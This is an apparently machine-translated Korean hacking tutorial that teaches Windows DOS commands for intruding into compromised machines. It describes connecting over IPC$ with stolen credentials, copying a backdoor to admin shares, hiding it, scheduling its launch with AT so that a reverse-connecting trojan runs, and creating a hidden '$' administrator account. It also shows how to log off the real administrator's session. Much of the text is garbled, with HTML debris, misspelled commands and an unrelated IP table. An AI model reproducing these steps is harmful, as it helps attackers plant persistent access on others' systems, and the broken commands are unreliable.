DOS 명령 시작
여러분은 침입할 때 반드시 DOS 명령을 사용하게 될 것입니다. 그 기능은 매우 강력합니다. 오늘 저는 자주 사용하는 DOS 명령에 대해 자세히 설명하겠습니다. 주로 입문자와 DOS 명령을 접한 적은 친구에게 보여 줍니다. 좀 더 자주 사용하는 몇 가지를 골라서 말씀드리겠습니다.
< Windows XP 는 ..DIR
현재 디스크 아래에 있는 모든 폴더와 파일을 표시합니다.
더 일반적인 방법은 뒷문이나 서버 (예: 이름) 를 업로드하는 것입니다 업로드가 성공했는지 확인하고 싶습니다. DIR 명령을 사용하여 볼 수 있습니다. 명령은 다음과 같습니다.
dir c: \ winnt \ system32 \ systems.exe
762systems.exe
파일 1 개 194,762 바이트
0 디렉토리 4,658,597,888 가용 바이트
<;볼륨의 일련 번호는 6458-3db8
c: \ winnt \ system32 \ 의 디렉토리
입니다. 파일을 찾을 수 없습니다 Cd winnt // winnt 폴더
c: \ winntgt; Cd system32 // system32 폴더 입력
c: \ winnt \ system32gt; Cd.. // 한 레벨 위로 돌아가기
c: \ winntgt; Cd ..
c: \ gt;
c: \ gt; D://d 디스크 입력
d: \ gt; E://e 디스크 입력
e: \ gt;
del 및 deltree
DEL: 파일 삭제.
다음 명령을 보십시오.
c: Dell c: \ XX \ WW.txt//CD 의 xx 디렉토리에서 ww 라는 파일을 삭제합니다.
c: \ gt;
c: \ gt; Dell c: \ XX \ *. *//CD 의 xx 디렉토리에 있는 모든 파일 삭제
deltree
이것은 더욱 파괴적이며 모든 파일을 삭제할 수 있을 뿐 아니라 폴더도 < Deltree c:\winnt ///CD 에 있는 winnt 의 모든 파일과 폴더 삭제.
이 사람은.
attrid
를 조심해서 사용해야 한다 S 는
파일 또는 폴더 속성을 변경하는 것을 의미하고, "+"는 증가를 의미하며, "-"는 속성을 제거하는 것을 의미합니다.
보통 우리는 뒷문이나 서버를 육계의 c: \ winnt 에 업로드합니다 Attrid+h c: \ winnt \ system32 \ systems.exe//system32 에서 systems.exe 를 찾을 수 없습니다
c > Attrid-h c: \ 1.txt \ system32 \ systems.exe//systems.exe 의 숨겨진 속성 제거
copy
Copy c: \ 1.txt d: \ vv \ 1.exe
예를 들어 육계와 IPC$ 연결을 설정했습니다 (연결 방법? (나중에 얘기할게요) 그리고 육계는 개방되어 있습니다. * * * 여기 예를 들어 D 디스크를 개방합니다. CD 아래에 있는 systems.exe 라는 뒷문이나 서버측을 육계의 D 접시에 올려주시면 다음과 같이 주문할 수 있습니다.
< P > C: \ G Copy c: \ systems.exe \ \ 육계 IP \ d $유형
파일 내용 표시
유형 c: \ xx \ Hack.txt
일련 번호 시작 IP 주소 종료 IP 주소 국가/도/시/군/조직
58024.179.140.000022 P >
80 061.013.000.000 061.013.255.255 대만
86 061.058.065.000 P >
87 061.059.160.000 061.059.255.255 대만
89 061.070.100.000 P >
1788061.217.179.000 061.217.179.255 대만 타이난시
1789061.216.000 P >
1790 061.220.080.000 061.220.150.255 대만 타이베이시
1791 061.224.000 P >
1792 061.225.000.000 061.225.255.255 대만
3390 134.208.000 .. P >
3584 139.175.000.000 139.175.255.255 대만
3590 140.092.000 .. P >
3593 140.096.000.000 140.096.255.255 대만
3596 140.112.000 ..
또 다른 용법은 육계의 CMD 에 들어간 후 육계가 사용하는 운영체제를 살펴보는 것입니다. 명령은 다음과 같습니다.
< P > C: \ GT; Type c: \ boot.ini[부트 로더]
timeout = 30
dimeout
P >
[operating systems]
multi (0) disk (0) rdisk (0) partition (1) , 저는 XP 시스템을 사용합니다.
이것은 제가 자주 사용한다고 생각하는 명령이고, 다른 것은 rd 입니다. Md 등. 당신들은 자료를 찾아 볼 수 있는 것에 관심이 있습니다. 평진은 비교적 적게 사용한다.
< P > < ping < P > < P > 이것은 가장 많이 쓰는 명령이다. 하지만 지금은 제대로 작동하지 않는 것 같다. 대부분의 사이트와 개인용 컴퓨터는 방화벽으로 Ping 을 차단한다. 대부분의 경우 P 가 통하지 않는다.ping URL
아래 p 는 본 사이트
c: \ gt; Ping www.hf110.com
pinging www.hf110.com [218.89.0.231] with 32 bytes of data P >
reply from 218.89.0.231: bytes = 32 time = 67ms TTL = 116
reply from 218 > P >
reply from 218.89.0.231: bytes = 32 time = 67ms TTL = 116
ping statistics Lost = 0 (0 loss),
approximate round trip times in milli-seconds:
minimum Average = 66ms
위 p 사이트의 IP 는 218.89.0.231 이고, TTL=116. 대략 windows 운영 체제를 사용하고 있다. 일반적으로 TTL 값은 128 정도다 관리자는 레지스트리를 변경하여 TTL 값을 수정할 수 있습니다.
net use
육계의 사용자 이름과 암호를 얻은 후 이 명령을 사용하여 IPC$ 연결
net use > (예: 시스템. exe, 당신의 d 디스크 아래) ..
copy d: \ systems.exe \ \ 육계 ip\c$ // 여기 개방해야 합니다 24 시간제입니다. 예를 들어 오후 3 시 10 분입니다. 쓰기 15: 10
AT \ \ 육계 IP 15: 12 Systems.exe//15: 12 분에 sy 를 실행합니다
Stems.exe
여기, 당신이 반등목마를 업로드하면, 그것이 당신을 연결하기를 기다릴 수 있습니다. 사실, 침입 과정에서, 많은 우연성이 있습니다. 예를 들면, 위에서, 당신은 IPC 연결을 성공적으로 할 수 있습니다. 하지만 반드시 nettime \ 하지만 뒷문이나 서버측이 반드시 운행할 기회가 있는 것은 아니다.
바이러스 백신 소프트웨어에 의해 살해될 수 있다. 그래서 침입 과정에서 실패는 흔한 일이다. 이 방법은 안 되고 또 다른.
넷사용자
가 될 수 있다 Net user\\ BILLGATES 의 사용자 계정
----------------
c: \ gt;
위 내 모든 사용자 ..
이제 새 setwell 사용자, 암호 123456, 스크린 샷은 다음과 같습니다
c: \ gt; Net user setwell 123456 /add
명령이 성공적으로 완료되었습니다.
c: \ gt; Net local group administrators setwell/add//이 명령은 set well 을 관리자
명령으로 추가하는 데 성공했습니다.
다음으로
c: \ gt; Net user
\\ BILLGATES 의 사용자 계정
---------------- P >
set well support _ 388945a0yhkj
명령이 성공적으로 완료되었습니다.
만든 사용자는 net user 명령을 사용하여 볼 수 있습니다. 우리는 사용자 뒤에 $ 를 추가하여 작은 숨김을 할 수 있습니다. 이번에는 set 라는 사용자를 만들었습니다. 스크린 샷은 다음과 같습니다.
c: \ gt; Net user set$ 123456 /add
명령이 성공적으로 완료되었습니다.
c: \ gt; Net local group administrators set $/add
명령이 성공적으로 완료되었습니다.
c: \ gt; Net user
\\ BILLGATES 의 사용자 계정
---------------- P >
set well support _ 388945a0yhkj
명령이 성공적으로 완료되었습니다.
c: \ gt;
아니요, 방금 설정한 사용자 set$ 를 볼 수 없습니다. 이 명령을 사용하여 볼 수 있습니다. net localgroup administrators, 이 명령은 다음과 같은 모든 관리자를 보여 줍니다.
Net local group administrators
별칭 administrators
주석 관리자는 컴퓨터/도메인에 대한 무제한 전체 액세스 권한을 가집니다
P >
---------------
c: \ gt;
아니요, 우리는 set$ 라는 사용자를 보았습니다.
사용자를 삭제하려면 이 명령을 사용합니다.
c: \ gt; Net user set well/delete
net start
1. net start TTS 와 같은 일부 서비스 시작
Net start
는 다음과 같은 Windows 서비스를 시작했습니다.
자동 업데이트
com+event system P >
distributed link tracking client
DNS client
error reporting service P >
logical disk manager
messenger
이것은 서비스의 일부일 뿐입니다 ..
net stop C$ D$ e$ f$ admin$ ipc$ 를 즐기세요. 이것이 시스템 기본값입니다. 제 모든 것이 꺼져 있습니다. 저는
육계에 가서 그림을 찍으세요.
c: Netshare
d $ d: \ 기본값 * * * 즐기세요
f $ f: \ 기본 * * * 즐거움
admin $ c: \ winnt 원격 관리
c $ c: \ 기본값 * * * 즐거움
e $ e: \ 기본값 * * * 즐거움
명령이 성공적으로 완료되었습니다.
c: ₩ documents and settings ₩ administrator gt;
이 육계의 IPC$*** * * 이 육계의 IPC $ * * * * * *
netview
도 보기 * * Net view
서버 이름 주석
------------- 17
\ \ hmz
\ \ kgh
명령이 성공적으로 완료되었습니다.
c: ₩ documents and settings ₩ administrator gt;
DOS 명령을 배우는 것은 좀 귀찮아 보이지만 사실 쉽게 배울 수 있다. 그리고 잘 배웠고, 침략에서 중요한 역할을 할 것이다. 다음에 netstat 등의 명령을 하겠습니다.
netstat-an Netstat-an
active connections
proto local address foreign address state P >
TCP 0.0.0.0: 135 0.0.0.0: 0 listening
TCP 0.0.0.0 P >
TCP 0.0.0.0: 1029 0.0.0.0: 0 listening
TCP 0.0.0.0 P >
tcp180.254.158.42: 139 0.0.0.0: 0 listening
tcp218.95 .. P >
UDP 0.0.0.0: 500 *: *
UDP 0.0.0.0: 1035 *: *
UDP 0.0.0.0: 1136 *: *
proto local address foreign address state
LISTENING 수신 상태는 상대방의 접속 대기 중
ESTABLISHED 가 접속 중 ..
TCP 프로토콜이 TCP
UDP 임을 나타냅니다 P >
ip(218.95.49.187: 2935 ip(218.89.0.231: 80 established
이는 TCP 프로토콜 네이티브 id 를 활용한다는 의미입니다 P >
쿼리
이 명령은 3389 포트 (반드시 3389 포트일 필요는 없으며 다른 포트로 변경되었을 수도 있음. 엄밀히 말하면 원격 터미널 서비스가 켜져 있어야 함) 를 연 기계만 사용할 수 있다. 1$ 의 사용자 이름을 사용했습니다 Query user
username session name id state
administrator console 0 실행 중
1 실행 중
위에 있는 것을 보고 관리자도 있습니다. 종료하시려면 다음과 같은 명령을 사용하십시오.
logoff id 여기 logoff 1.
;